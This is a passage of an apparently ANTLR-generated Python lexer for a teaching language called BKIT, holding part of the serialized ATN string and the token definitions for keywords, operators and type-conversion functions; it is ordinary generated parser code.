buf.write(\"\\7^\\2\\2\\u011b\\u011c\\n\\7\\2\\2\\u011c \\3\\2\\2\\2\\u011d\\u011e\")\n buf.write(\"\\7^\\2\\2\\u011e\\u011f\\t\\7\\2\\2\\u011f\\\"\\3\\2\\2\\2\\u0120\\u0121\")\n buf.write(\"\\7)\\2\\2\\u0121\\u0122\\7$\\2\\2\\u0122$\\3\\2\\2\\2\\u0123\\u0127\")\n buf.write(\"\\n\\b\\2\\2\\u0124\\u0127\\5!\\21\\2\\u0125\\u0127\\5#\\22\\2\\u0126\")\n buf.write(\"\\u0123\\3\\2\\2\\2\\u0126\\u0124\\3\\2\\2\\2\\u0126\\u0125\\3\\2\\2\\2\")\n buf.write(\"\\u0127&\\3\\2\\2\\2\\u0128\\u0129\\t\\t\\2\\2\\u0129(\\3\\2\\2\\2\\u012a\")\n buf.write(\"\\u012b\\t\\n\\2\\2\\u012b*\\3\\2\\2\\2\\u012c\\u012d\\7\\62\\2\\2\\u012d\")\n buf.write(\"\\u0131\\7z\\2\\2\\u012e\\u012f\\7\\62\\2\\2\\u012f\\u0131\\7Z\\2\\2\")\n buf.write(\"\\u0130\\u012c\\3\\2\\2\\2\\u0130\\u012e\\3\\2\\2\\2\\u0131\\u0132\\3\")\n buf.write(\"\\2\\2\\2\\u0132\\u0136\\t\\13\\2\\2\\u0133\\u0135\\5\\'\\24\\2\\u0134\")\n buf.write(\"\\u0133\\3\\2\\2\\2\\u0135\\u0138\\3\\2\\2\\2\\u0136\\u0134\\3\\2\\2\\2\")\n buf.write(\"\\u0136\\u0137\\3\\2\\2\\2\\u0137,\\3\\2\\2\\2\\u0138\\u0136\\3\\2\\2\")\n buf.write(\"\\2\\u0139\\u0142\\t\\f\\2\\2\\u013a\\u013e\\t\\r\\2\\2\\u013b\\u013d\")\n buf.write(\"\\t\\4\\2\\2\\u013c\\u013b\\3\\2\\2\\2\\u013d\\u0140\\3\\2\\2\\2\\u013e\")\n buf.write(\"\\u013c\\3\\2\\2\\2\\u013e\\u013f\\3\\2\\2\\2\\u013f\\u0142\\3\\2\\2\\2\")\n buf.write(\"\\u0140\\u013e\\3\\2\\2\\2\\u0141\\u0139\\3\\2\\2\\2\\u0141\\u013a\\3\")\n buf.write(\"\\2\\2\\2\\u0142.\\3\\2\\2\\2\\u0143\\u0144\\7\\62\\2\\2\\u0144\\u0148\")\n buf.write(\"\\7q\\2\\2\\u0145\\u0146\\7\\62\\2\\2\\u0146\\u0148\\7Q\\2\\2\\u0147\")\n buf.write(\"\\u0143\\3\\2\\2\\2\\u0147\\u0145\\3\\2\\2\\2\\u0148\\u0149\\3\\2\\2\\2\")\n buf.write(\"\\u0149\\u014d\\t\\16\\2\\2\\u014a\\u014c\\5)\\25\\2\\u014b\\u014a\")\n buf.write(\"\\3\\2\\2\\2\\u014c\\u014f\\3\\2\\2\\2\\u014d\\u014b\\3\\2\\2\\2\\u014d\")\n buf.write(\"\\u014e\\3\\2\\2\\2\\u014e\\60\\3\\2\\2\\2\\u014f\\u014d\\3\\2\\2\\2\\u0150\")\n buf.write(\"\\u0154\\5-\\27\\2\\u0151\\u0154\\5+\\26\\2\\u0152\\u0154\\5/\\30\\2\")\n buf.write(\"\\u0153\\u0150\\3\\2\\2\\2\\u0153\\u0151\\3\\2\\2\\2\\u0153\\u0152\\3\")\n buf.write(\"\\2\\2\\2\\u0154\\62\\3\\2\\2\\2\\u0155\\u0156\\5\\35\\17\\2\\u0156\\64\")\n buf.write(\"\\3\\2\\2\\2\\u0157\\u015a\\5]/\\2\\u0158\\u015a\\5_\\60\\2\\u0159\\u0157\")\n buf.write(\"\\3\\2\\2\\2\\u0159\\u0158\\3\\2\\2\\2\\u015a\\66\\3\\2\\2\\2\\u015b\\u015f\")\n buf.write(\"\\5\\u00a7T\\2\\u015c\\u015e\\5%\\23\\2\\u015d\\u015c\\3\\2\\2\\2\\u015e\")\n buf.write(\"\\u0161\\3\\2\\2\\2\\u015f\\u015d\\3\\2\\2\\2\\u015f\\u0160\\3\\2\\2\\2\")\n buf.write(\"\\u0160\\u0162\\3\\2\\2\\2\\u0161\\u015f\\3\\2\\2\\2\\u0162\\u0163\\5\")\n buf.write(\"\\u00a7T\\2\\u0163\\u0164\\b\\34\\2\\2\\u01648\\3\\2\\2\\2\\u0165\\u0166\")\n buf.write(\"\\7D\\2\\2\\u0166\\u0167\\7q\\2\\2\\u0167\\u0168\\7f\\2\\2\\u0168\\u0169\")\n buf.write(\"\\7{\\2\\2\\u0169:\\3\\2\\2\\2\\u016a\\u016b\\7D\\2\\2\\u016b\\u016c\")\n buf.write(\"\\7t\\2\\2\\u016c\\u016d\\7g\\2\\2\\u016d\\u016e\\7c\\2\\2\\u016e\\u016f\")\n buf.write(\"\\7m\\2\\2\\u016f<\\3\\2\\2\\2\\u0170\\u0171\\7E\\2\\2\\u0171\\u0172\")\n buf.write(\"\\7q\\2\\2\\u0172\\u0173\\7p\\2\\2\\u0173\\u0174\\7v\\2\\2\\u0174\\u0175\")\n buf.write(\"\\7k\\2\\2\\u0175\\u0176\\7p\\2\\2\\u0176\\u0177\\7w\\2\\2\\u0177\\u0178\")\n buf.write(\"\\7g\\2\\2\\u0178>\\3\\2\\2\\2\\u0179\\u017a\\7F\\2\\2\\u017a\\u017b\")\n buf.write(\"\\7q\\2\\2\\u017b@\\3\\2\\2\\2\\u017c\\u017d\\7G\\2\\2\\u017d\\u017e\")\n buf.write(\"\\7n\\2\\2\\u017e\\u017f\\7u\\2\\2\\u017f\\u0180\\7g\\2\\2\\u0180B\\3\")\n buf.write(\"\\2\\2\\2\\u0181\\u0182\\7G\\2\\2\\u0182\\u0183\\7n\\2\\2\\u0183\\u0184\")\n buf.write(\"\\7u\\2\\2\\u0184\\u0185\\7g\\2\\2\\u0185\\u0186\\7K\\2\\2\\u0186\\u0187\")\n buf.write(\"\\7h\\2\\2\\u0187D\\3\\2\\2\\2\\u0188\\u0189\\7G\\2\\2\\u0189\\u018a\")\n buf.write(\"\\7p\\2\\2\\u018a\\u018b\\7f\\2\\2\\u018b\\u018c\\7K\\2\\2\\u018c\\u018d\")\n buf.write(\"\\7h\\2\\2\\u018dF\\3\\2\\2\\2\\u018e\\u018f\\7G\\2\\2\\u018f\\u0190\")\n buf.write(\"\\7p\\2\\2\\u0190\\u0191\\7f\\2\\2\\u0191\\u0192\\7D\\2\\2\\u0192\\u0193\")\n buf.write(\"\\7q\\2\\2\\u0193\\u0194\\7f\\2\\2\\u0194\\u0195\\7{\\2\\2\\u0195H\\3\")\n buf.write(\"\\2\\2\\2\\u0196\\u0197\\7G\\2\\2\\u0197\\u0198\\7p\\2\\2\\u0198\\u0199\")\n buf.write(\"\\7f\\2\\2\\u0199\\u019a\\7H\\2\\2\\u019a\\u019b\\7q\\2\\2\\u019b\\u019c\")\n buf.write(\"\\7t\\2\\2\\u019cJ\\3\\2\\2\\2\\u019d\\u019e\\7G\\2\\2\\u019e\\u019f\")\n buf.write(\"\\7p\\2\\2\\u019f\\u01a0\\7f\\2\\2\\u01a0\\u01a1\\7Y\\2\\2\\u01a1\\u01a2\")\n buf.write(\"\\7j\\2\\2\\u01a2\\u01a3\\7k\\2\\2\\u01a3\\u01a4\\7n\\2\\2\\u01a4\\u01a5\")\n buf.write(\"\\7g\\2\\2\\u01a5L\\3\\2\\2\\2\\u01a6\\u01a7\\7H\\2\\2\\u01a7\\u01a8\")\n buf.write(\"\\7q\\2\\2\\u01a8\\u01a9\\7t\\2\\2\\u01a9N\\3\\2\\2\\2\\u01aa\\u01ab\")\n buf.write(\"\\7H\\2\\2\\u01ab\\u01ac\\7w\\2\\2\\u01ac\\u01ad\\7p\\2\\2\\u01ad\\u01ae\")\n buf.write(\"\\7e\\2\\2\\u01ae\\u01af\\7v\\2\\2\\u01af\\u01b0\\7k\\2\\2\\u01b0\\u01b1\")\n buf.write(\"\\7q\\2\\2\\u01b1\\u01b2\\7p\\2\\2\\u01b2P\\3\\2\\2\\2\\u01b3\\u01b4\")\n buf.write(\"\\7K\\2\\2\\u01b4\\u01b5\\7h\\2\\2\\u01b5R\\3\\2\\2\\2\\u01b6\\u01b7\")\n buf.write(\"\\7R\\2\\2\\u01b7\\u01b8\\7c\\2\\2\\u01b8\\u01b9\\7t\\2\\2\\u01b9\\u01ba\")\n buf.write(\"\\7c\\2\\2\\u01ba\\u01bb\\7o\\2\\2\\u01bb\\u01bc\\7g\\2\\2\\u01bc\\u01bd\")\n buf.write(\"\\7v\\2\\2\\u01bd\\u01be\\7g\\2\\2\\u01be\\u01bf\\7t\\2\\2\\u01bfT\\3\")\n buf.write(\"\\2\\2\\2\\u01c0\\u01c1\\7T\\2\\2\\u01c1\\u01c2\\7g\\2\\2\\u01c2\\u01c3\")\n buf.write(\"\\7v\\2\\2\\u01c3\\u01c4\\7w\\2\\2\\u01c4\\u01c5\\7t\\2\\2\\u01c5\\u01c6\")\n buf.write(\"\\7p\\2\\2\\u01c6V\\3\\2\\2\\2\\u01c7\\u01c8\\7V\\2\\2\\u01c8\\u01c9\")\n buf.write(\"\\7j\\2\\2\\u01c9\\u01ca\\7g\\2\\2\\u01ca\\u01cb\\7p\\2\\2\\u01cbX\\3\")\n buf.write(\"\\2\\2\\2\\u01cc\\u01cd\\7X\\2\\2\\u01cd\\u01ce\\7c\\2\\2\\u01ce\\u01cf\")\n buf.write(\"\\7t\\2\\2\\u01cfZ\\3\\2\\2\\2\\u01d0\\u01d1\\7Y\\2\\2\\u01d1\\u01d2\")\n buf.write(\"\\7j\\2\\2\\u01d2\\u01d3\\7k\\2\\2\\u01d3\\u01d4\\7n\\2\\2\\u01d4\\u01d5\")\n buf.write(\"\\7g\\2\\2\\u01d5\\\\\\3\\2\\2\\2\\u01d6\\u01d7\\7V\\2\\2\\u01d7\\u01d8\")\n buf.write(\"\\7t\\2\\2\\u01d8\\u01d9\\7w\\2\\2\\u01d9\\u01da\\7g\\2\\2\\u01da^\\3\")\n buf.write(\"\\2\\2\\2\\u01db\\u01dc\\7H\\2\\2\\u01dc\\u01dd\\7c\\2\\2\\u01dd\\u01de\")\n buf.write(\"\\7n\\2\\2\\u01de\\u01df\\7u\\2\\2\\u01df\\u01e0\\7g\\2\\2\\u01e0`\\3\")\n buf.write(\"\\2\\2\\2\\u01e1\\u01e2\\7G\\2\\2\\u01e2\\u01e3\\7p\\2\\2\\u01e3\\u01e4\")\n buf.write(\"\\7f\\2\\2\\u01e4\\u01e5\\7F\\2\\2\\u01e5\\u01e6\\7q\\2\\2\\u01e6b\\3\")\n buf.write(\"\\2\\2\\2\\u01e7\\u01e8\\7-\\2\\2\\u01e8d\\3\\2\\2\\2\\u01e9\\u01ea\\7\")\n buf.write(\"-\\2\\2\\u01ea\\u01eb\\7\\60\\2\\2\\u01ebf\\3\\2\\2\\2\\u01ec\\u01ed\")\n buf.write(\"\\7/\\2\\2\\u01edh\\3\\2\\2\\2\\u01ee\\u01ef\\7/\\2\\2\\u01ef\\u01f0\")\n buf.write(\"\\7\\60\\2\\2\\u01f0j\\3\\2\\2\\2\\u01f1\\u01f2\\7,\\2\\2\\u01f2l\\3\\2\")\n buf.write(\"\\2\\2\\u01f3\\u01f4\\7,\\2\\2\\u01f4\\u01f5\\7\\60\\2\\2\\u01f5n\\3\")\n buf.write(\"\\2\\2\\2\\u01f6\\u01f7\\7^\\2\\2\\u01f7p\\3\\2\\2\\2\\u01f8\\u01f9\\7\")\n buf.write(\"^\\2\\2\\u01f9\\u01fa\\7\\60\\2\\2\\u01far\\3\\2\\2\\2\\u01fb\\u01fc\")\n buf.write(\"\\7\\'\\2\\2\\u01fct\\3\\2\\2\\2\\u01fd\\u01fe\\7#\\2\\2\\u01fev\\3\\2\")\n buf.write(\"\\2\\2\\u01ff\\u0200\\7(\\2\\2\\u0200\\u0201\\7(\\2\\2\\u0201x\\3\\2\")\n buf.write(\"\\2\\2\\u0202\\u0203\\7~\\2\\2\\u0203\\u0204\\7~\\2\\2\\u0204z\\3\\2\")\n buf.write(\"\\2\\2\\u0205\\u0206\\7?\\2\\2\\u0206\\u0207\\7?\\2\\2\\u0207|\\3\\2\")\n buf.write(\"\\2\\2\\u0208\\u0209\\7#\\2\\2\\u0209\\u020a\\7?\\2\\2\\u020a~\\3\\2\")\n buf.write(\"\\2\\2\\u020b\\u020c\\7>\\2\\2\\u020c\\u0080\\3\\2\\2\\2\\u020d\\u020e\")\n buf.write(\"\\7@\\2\\2\\u020e\\u0082\\3\\2\\2\\2\\u020f\\u0210\\7>\\2\\2\\u0210\\u0211\")\n buf.write(\"\\7?\\2\\2\\u0211\\u0084\\3\\2\\2\\2\\u0212\\u0213\\7@\\2\\2\\u0213\\u0214\")\n buf.write(\"\\7?\\2\\2\\u0214\\u0086\\3\\2\\2\\2\\u0215\\u0216\\7?\\2\\2\\u0216\\u0217\")\n buf.write(\"\\7\\61\\2\\2\\u0217\\u0218\\7?\\2\\2\\u0218\\u0088\\3\\2\\2\\2\\u0219\")\n buf.write(\"\\u021a\\7>\\2\\2\\u021a\\u021b\\7\\60\\2\\2\\u021b\\u008a\\3\\2\\2\\2\")\n buf.write(\"\\u021c\\u021d\\7@\\2\\2\\u021d\\u021e\\7\\60\\2\\2\\u021e\\u008c\\3\")\n buf.write(\"\\2\\2\\2\\u021f\\u0220\\7>\\2\\2\\u0220\\u0221\\7?\\2\\2\\u0221\\u0222\")\n buf.write(\"\\7\\60\\2\\2\\u0222\\u008e\\3\\2\\2\\2\\u0223\\u0224\\7@\\2\\2\\u0224\")\n buf.write(\"\\u0225\\7?\\2\\2\\u0225\\u0226\\7\\60\\2\\2\\u0226\\u0090\\3\\2\\2\\2\")\n buf.write(\"\\u0227\\u0228\\7*\\2\\2\\u0228\\u0092\\3\\2\\2\\2\\u0229\\u022a\\7\")\n buf.write(\"+\\2\\2\\u022a\\u0094\\3\\2\\2\\2\\u022b\\u022c\\7]\\2\\2\\u022c\\u0096\")\n buf.write(\"\\3\\2\\2\\2\\u022d\\u022e\\7_\\2\\2\\u022e\\u0098\\3\\2\\2\\2\\u022f\")\n buf.write(\"\\u0230\\7}\\2\\2\\u0230\\u009a\\3\\2\\2\\2\\u0231\\u0232\\7\\177\\2\")\n buf.write(\"\\2\\u0232\\u009c\\3\\2\\2\\2\\u0233\\u0234\\7<\\2\\2\\u0234\\u009e\")\n buf.write(\"\\3\\2\\2\\2\\u0235\\u0236\\7\\60\\2\\2\\u0236\\u00a0\\3\\2\\2\\2\\u0237\")\n buf.write(\"\\u0238\\7=\\2\\2\\u0238\\u00a2\\3\\2\\2\\2\\u0239\\u023a\\7.\\2\\2\\u023a\")\n buf.write(\"\\u00a4\\3\\2\\2\\2\\u023b\\u023c\\7?\\2\\2\\u023c\\u00a6\\3\\2\\2\\2\")\n buf.write(\"\\u023d\\u023e\\7$\\2\\2\\u023e\\u00a8\\3\\2\\2\\2\\u023f\\u0240\\7\")\n buf.write(\"k\\2\\2\\u0240\\u0241\\7p\\2\\2\\u0241\\u0242\\7v\\2\\2\\u0242\\u0243\")\n buf.write(\"\\7a\\2\\2\\u0243\\u0244\\7q\\2\\2\\u0244\\u0245\\7h\\2\\2\\u0245\\u0246\")\n buf.write(\"\\7a\\2\\2\\u0246\\u0247\\7h\\2\\2\\u0247\\u0248\\7n\\2\\2\\u0248\\u0249\")\n buf.write(\"\\7q\\2\\2\\u0249\\u024a\\7c\\2\\2\\u024a\\u024b\\7v\\2\\2\\u024b\\u00aa\")\n buf.write(\"\\3\\2\\2\\2\\u024c\\u024d\\7k\\2\\2\\u024d\\u024e\\7p\\2\\2\\u024e\\u024f\")\n buf.write(\"\\7v\\2\\2\\u024f\\u0250\\7a\\2\\2\\u0250\\u0251\\7q\\2\\2\\u0251\\u0252\")\n buf.write(\"\\7h\\2\\2\\u0252\\u0253\\7a\\2\\2\\u0253\\u0254\\7u\\2\\2\\u0254\\u0255\")\n buf.write(\"\\7v\\2\\2\\u0255\\u0256\\7t\\2\\2\\u0256\\u0257\\7k\\2\\2\\u0257\\u0258\")\n buf.write(\"\\7p\\2\\2\\u0258\\u0259\\7i\\2\\2\\u0259\\u00ac\\3\\2\\2\\2\\u025a\\u025b\")\n buf.write(\"\\7h\\2\\2\\u025b\\u025c\\7n\\2\\2\\u025c\\u025d\\7q\\2\\2\\u025d\\u025e\")\n buf.write(\"\\7c\\2\\2\\u025e\\u025f\\7v\\2\\2\\u025f\\u0260\\7a\\2\\2\\u0260\\u0261\")\n buf.write(\"\\7v\\2\\2\\u0261\\u0262\\7q\\2\\2\\u0262\\u0263\\7a\\2\\2\\u0263\\u0264\")\n buf.write(\"\\7k\\2\\2\\u0264\\u0265\\7p\\2\\2\\u0265\\u0266\\7v\\2\\2\\u0266\\u00ae\")\n buf.write(\"\\3\\2\\2\\2\\u0267\\u0268\\7h\\2\\2\\u0268\\u0269\\7n\\2\\2\\u0269\\u026a\")\n buf.write(\"\\7q\\2\\2\\u026a\\u026b\\7c\\2\\2\\u026b\\u026c\\7v\\2\\2\\u026c\\u026d\")\n buf.write(\"\\7a\\2\\2\\u026d\\u026e\\7q\\2\\2\\u026e\\u026f\\7h\\2\\2\\u026f\\u0270\")\n buf.write(\"\\7a\\2\\2\\u0270\\u0271\\7u\\2\\2\\u0271\\u0272\\7v\\2\\2\\u0272\\u0273\")\n buf.write(\"\\7t\\2\\2\\u0273\\u0274\\7k\\2\\2\\u0274\\u0275\\7p\\2\\2\\u0275\\u0276\")\n buf.write(\"\\7i\\2\\2\\u0276\\u00b0\\3\\2\\2\\2\\u0277\\u0278\\7d\\2\\2\\u0278\\u0279\")\n buf.write(\"\\7q\\2\\2\\u0279\\u027a\\7q\\2\\2\\u027a\\u027b\\7n\\2\\2\\u027b\\u027c\")\n buf.write(\"\\7a\\2\\2\\u027c\\u027d\\7q\\2\\2\\u027d\\u027e\\7h\\2\\2\\u027e\\u027f\")\n buf.write(\"\\7a\\2\\2\\u027f\\u0280\\7u\\2\\2\\u0280\\u0281\\7v\\2\\2\\u0281\\u0282\")\n buf.write(\"\\7t\\2\\2\\u0282\\u0283\\7k\\2\\2\\u0283\\u0284\\7p\\2\\2\\u0284\\u0285\")\n buf.write(\"\\7i\\2\\2\\u0285\\u00b2\\3\\2\\2\\2\\u0286\\u0287\\7u\\2\\2\\u0287\\u0288\")\n buf.write(\"\\7v\\2\\2\\u0288\\u0289\\7t\\2\\2\\u0289\\u028a\\7k\\2\\2\\u028a\\u028b\")\n buf.write(\"\\7p\\2\\2\\u028b\\u028c\\7i\\2\\2\\u028c\\u028d\\7a\\2\\2\\u028d\\u028e\")\n buf.write(\"\\7q\\2\\2\\u028e\\u028f\\7h\\2\\2\\u028f\\u0290\\7a\\2\\2\\u0290\\u0291\")\n buf.write(\"\\7d\\2\\2\\u0291\\u0292\\7q\\2\\2\\u0292\\u0293\\7q\\2\\2\\u0293\\u0294\")\n buf.write(\"\\7n\\2\\2\\u0294\\u00b4\\3\\2\\2\\2\\u0295\\u0296\\7u\\2\\2\\u0296\\u0297\")\n buf.write(\"\\7v\\2\\2\\u0297\\u0298\\7t\\2\\2\\u0298\\u0299\\7k\\2\\2\\u0299\\u029a\")\n buf.write(\"\\7p\\2\\2\\u029a\\u029b\\7i\\2\\2\\u029b\\u029c\\7a\\2\\2\\u029c\\u029d\")\n buf.write(\"\\7q\\2\\2\\u029d\\u029e\\7h\\2\\2\\u029e\\u029f\\7a\\2\\2\\u029f\\u02a0\")\n buf.write(\"\\7k\\2\\2\\u02a0\\u02a1\\7p\\2\\2\\u02a1\\u02a2\\7v\\2\\2\\u02a2\\u00b6\")\n buf.write(\"\\3\\2\\2\\2\\u02a3\\u02a4\\7u\\2\\2\\u02a4\\u02a5\\7v\\2\\2\\u02a5\\u02a6\")\n buf.write(\"\\7t\\2\\2\\u02a6\\u02a7\\7k\\2\\2\\u02a7\\u02a8\\7p\\2\\2\\u02a8\\u02a9\")\n buf.write(\"\\7i\\2\\2\\u02a9\\u02aa\\7a\\2\\2\\u02aa\\u02ab\\7q\\2\\2\\u02ab\\u02ac\")\n buf.write(\"\\7h\\2\\2\\u02ac\\u02ad\\7a\\2\\2\\u02ad\\u02ae\\7h\\2\\2\\u02ae\\u02af\")\n buf.write(\"\\7n\\2\\2\\u02af\\u02b0\\7q\\2\\2\\u02b0\\u02b1\\7c\\2\\2\\u02b1\\u02b2\")\n buf.write(\"\\7v\\2\\2\\u02b2\\u00b8\\3\\2\\2\\2\\u02b3\\u02b4\\7,\\2\\2\\u02b4\\u02b5\")\n buf.write(\"\\7,\\2\\2\\u02b5\\u02b9\\3\\2\\2\\2\\u02b6\\u02b8\\13\\2\\2\\2\\u02b7\")\n buf.write(\"\\u02b6\\3\\2\\2\\2\\u02b8\\u02bb\\3\\2\\2\\2\\u02b9\\u02ba\\3\\2\\2\\2\")\n buf.write(\"\\u02b9\\u02b7\\3\\2\\2\\2\\u02ba\\u02bc\\3\\2\\2\\2\\u02bb\\u02b9\\3\")\n buf.write(\"\\2\\2\\2\\u02bc\\u02bd\\7,\\2\\2\\u02bd\\u02be\\7,\\2\\2\\u02be\\u02bf\")\n buf.write(\"\\3\\2\\2\\2\\u02bf\\u02c0\\b]\\3\\2\\u02c0\\u00ba\\3\\2\\2\\2\\u02c1\")\n buf.write(\"\\u02c3\\t\\17\\2\\2\\u02c2\\u02c1\\3\\2\\2\\2\\u02c3\\u02c4\\3\\2\\2\")\n buf.write(\"\\2\\u02c4\\u02c2\\3\\2\\2\\2\\u02c4\\u02c5\\3\\2\\2\\2\\u02c5\\u02c6\")\n buf.write(\"\\3\\2\\2\\2\\u02c6\\u02c7\\b^\\3\\2\\u02c7\\u00bc\\3\\2\\2\\2\\u02c8\")\n buf.write(\"\\u02cc\\7$\\2\\2\\u02c9\\u02cb\\5%\\23\\2\\u02ca\\u02c9\\3\\2\\2\\2\")\n buf.write(\"\\u02cb\\u02ce\\3\\2\\2\\2\\u02cc\\u02ca\\3\\2\\2\\2\\u02cc\\u02cd\\3\")\n buf.write(\"\\2\\2\\2\\u02cd\\u02cf\\3\\2\\2\\2\\u02ce\\u02cc\\3\\2\\2\\2\\u02cf\\u02d0\")\n buf.write(\"\\5\\37\\20\\2\\u02d0\\u02d1\\b_\\4\\2\\u02d1\\u00be\\3\\2\\2\\2\\u02d2\")\n buf.write(\"\\u02d6\\7$\\2\\2\\u02d3\\u02d5\\5%\\23\\2\\u02d4\\u02d3\\3\\2\\2\\2\")\n buf.write(\"\\u02d5\\u02d8\\3\\2\\2\\2\\u02d6\\u02d4\\3\\2\\2\\2\\u02d6\\u02d7\\3\")\n buf.write(\"\\2\\2\\2\\u02d7\\u02da\\3\\2\\2\\2\\u02d8\\u02d6\\3\\2\\2\\2\\u02d9\\u02db\")\n buf.write(\"\\t\\20\\2\\2\\u02da\\u02d9\\3\\2\\2\\2\\u02db\\u02dc\\3\\2\\2\\2\\u02dc\")\n buf.write(\"\\u02dd\\b`\\5\\2\\u02dd\\u00c0\\3\\2\\2\\2\\u02de\\u02df\\7,\\2\\2\\u02df\")\n buf.write(\"\\u02e0\\7,\\2\\2\\u02e0\\u02e6\\3\\2\\2\\2\\u02e1\\u02e2\\7,\\2\\2\\u02e2\")\n buf.write(\"\\u02e5\\n\\21\\2\\2\\u02e3\\u02e5\\n\\21\\2\\2\\u02e4\\u02e1\\3\\2\\2\")\n buf.write(\"\\2\\u02e4\\u02e3\\3\\2\\2\\2\\u02e5\\u02e8\\3\\2\\2\\2\\u02e6\\u02e7\")\n buf.write(\"\\3\\2\\2\\2\\u02e6\\u02e4\\3\\2\\2\\2\\u02e7\\u02e9\\3\\2\\2\\2\\u02e8\")\n buf.write(\"\\u02e6\\3\\2\\2\\2\\u02e9\\u02ea\\7\\2\\2\\3\\u02ea\\u00c2\\3\\2\\2\\2\")\n buf.write(\"\\u02eb\\u02ec\\13\\2\\2\\2\\u02ec\\u00c4\\3\\2\\2\\2\\\"\\2\\u00ca\\u00cc\")\n buf.write(\"\\u00da\\u00de\\u00e4\\u00eb\\u00f1\\u00fb\\u0100\\u0105\\u010b\")\n buf.write(\"\\u0111\\u0115\\u0118\\u0126\\u0130\\u0136\\u013e\\u0141\\u0147\")\n buf.write(\"\\u014d\\u0153\\u0159\\u015f\\u02b9\\u02c4\\u02cc\\u02d6\\u02da\")\n buf.write(\"\\u02e4\\u02e6\\6\\3\\34\\2\\b\\2\\2\\3_\\3\\3`\\4\")\n return buf.getvalue()\n\n\nclass BKITLexer(Lexer):\n\n atn = ATNDeserializer().deserialize(serializedATN())\n\n decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]\n\n ID = 1\n REL_OP = 2\n BIN_LOGICAL_OP = 3\n ADD_OP = 4\n MUL_OP = 5\n UN_LOGICAL_OP = 6\n UN_OP = 7\n INT_LIT = 8\n FLOAT_LIT = 9\n BOOL_LIT = 10\n STRING_LIT = 11\n BODY = 12\n BREAK = 13\n CONTINUE = 14\n DO = 15\n ELSE = 16\n ELSEIF = 17\n ENDIF = 18\n ENDBODY = 19\n ENDFOR = 20\n ENDWHILE = 21\n FOR = 22\n FUNCTION = 23\n IF = 24\n PARAMETER = 25\n RETURN = 26\n THEN = 27\n VAR = 28\n WHILE = 29\n TRUE = 30\n FALSE = 31\n ENDDO = 32\n PLUS_INT = 33\n PLUS_FLOAT = 34\n MINUS_INT = 35\n MINUS_FLOAT = 36\n STAR_INT = 37\n STAR_FLOAT = 38\n DIV_INT = 39\n DIV_FLOAT = 40\n MOD = 41\n NOT = 42\n AND = 43\n OR = 44\n EQUAL = 45\n NOT_EQUAL_INT = 46\n LESS_INT = 47\n GREATER_INT = 48\n LESS_OR_EQUAL_INT = 49\n GREATER_OR_EQUAL_INT = 50\n NOT_EQUAL_FLOAT = 51\n LESS_FLOAT = 52\n GREATER_FLOAT = 53\n LESS_OR_EQUAL_FLOAT = 54\n GREATER_OR_EQUAL_FLOAT = 55\n LEFT_PAREN = 56\n RIGHT_PAREN = 57\n LEFT_BRACKET = 58\n RIGHT_BRACKET = 59\n LEFT_BRACE = 60\n RIGHT_BRACE = 61\n COLON = 62\n DOT = 63\n SEMI = 64\n COMMA = 65\n ASSIGN = 66\n DOUBLE_QUOTE = 67\n INT_OF_FLOAT = 68\n INT_OF_STRING = 69\n FLOAT_TO_INT = 70\n FLOAT_OF_STRING = 71\n BOOL_OF_STRING = 72\n STRING_OF_BOOL = 73\n STRING_OF_INT = 74\n STRING_OF_FLOAT = 75\n COMMENT = 76\n WS = 77\n ILLEGAL_ESCAPE = 78\n UNCLOSE_STRING = 79\n UNTERMINATED_COMMENT = 80\n ERROR_CHAR = 81\n\n channelNames = [ u\"DEFAULT_TOKEN_CHANNEL\", u\"HIDDEN\" ]\n\n modeNames = [ \"DEFAULT_MODE\" ]\n\n literalNames = [ \"<INVALID>\",\n \"'Body'\", \"'Break'\", \"'Continue'\", \"'Do'\", \"'Else'\", \"'ElseIf'\", \n \"'EndIf'\", \"'EndBody'\", \"'EndFor'\", \"'EndWhile'\", \"'For'\", \"'Function'\", \n \"'If'\", \"'Parameter'\", \"'Return'\", \"'Then'\", \"'Var'\", \"'While'\", \n \"'True'\", \"'False'\", \"'EndDo'\", \"'+'\", \"'+.'\", \"'-'\", \"'-.'\", \n \"'*'\", \"'*.'\", \"'\\\\'\", \"'\\\\.'\", \"'%'\", \"'!'\", \"'&&'\", \"'||'\", \n \"'=='\", \"'!='\", \"'<'\", \"'>'\", \"'<='\", \"'>='\", \"'=/='\", \"'<.'\", \n \"'>.'\", \"'<=.'\", \"'>=.'\", \"'('\", \"')'\", \"'['\", \"']'\", \"'{'\", \n \"'}'\", \"':'\", \"'.'\", \"';'\", \"','\", \"'='\", \"'\\\"'\", \"'int_of_float'\", \n \"'int_of_string'\", \"'float_to_int'\", \"'float_of_string'\", \"'bool_of_string'\", \n \"'string_of_bool'\", \"'string_of_int'\", \"'string_of_float'\" ]\n\n symbolicNames = [ \"<INVALID>\",\n \"ID\", \"REL_OP\", \"BIN_LOGICAL_OP\", \"ADD_OP\", \"MUL_OP\", \"UN_LOGICAL_OP\", \n \"UN_OP\", \"INT_LIT\", \"FLOAT_LIT\", \"BOOL_LIT\", \"STRING_LIT\", \"BODY\", \n \"BREAK\", \"CONTINUE\", \"DO\", \"ELSE\", \"ELSEIF\", \"ENDIF\", \"ENDBODY\", \n \"ENDFOR\", \"ENDWHILE\", \"FOR\", \"FUNCTION\", \"IF\", \"PARAMETER\", \n \"RETURN\", \"THEN\", \"VAR\", \"WHILE\", \"TRUE\", \"FALSE\", \"ENDDO\", \n \"PLUS_INT\", \"PLUS_FLOAT\", \"MINUS_INT\", \"MINUS_FLOAT\", \"STAR_INT\", \n \"STAR_FLOAT\", \"DIV_INT\", \"DIV_FLOAT\", \"MOD\", \"NOT\", \"AND\", \"OR\", \n \"EQUAL\", \"NOT_EQUAL_INT\", \"LESS_INT\", \"GREATER_INT\", \"LESS_OR_EQUAL_INT\", \n \"GREATER_OR_EQUAL_INT\", \"NOT_EQUAL_FLOAT\", \"LESS_FLOAT\", \"GREATER_FLOAT\", \n \"LESS_OR_EQUAL_FLOAT\", \"GREATER_OR_EQUAL_FLOAT\", \"LEFT_PAREN\", \n \"RIGHT_PAREN\", \"LEFT_BRACKET\", \"RIGHT_BRACKET\", \"LEFT_BRACE\", \n \"RIGHT_BRACE\", \"COLON\", \"DOT\", \"SEMI\", \"COMMA\", \"ASSIGN\", \"DOUBLE_QUOTE\", \n \"INT_OF_FLOAT\", \"INT_OF_STRING\", \"FLOAT_TO_INT\", \"FLOAT_OF_STRING\", \n \"BOOL_OF_STRING\", \"STRING_OF_BOOL\", \"STRING_OF_INT\", \"STRING_OF_FLOAT\", \n \"COMMENT\", 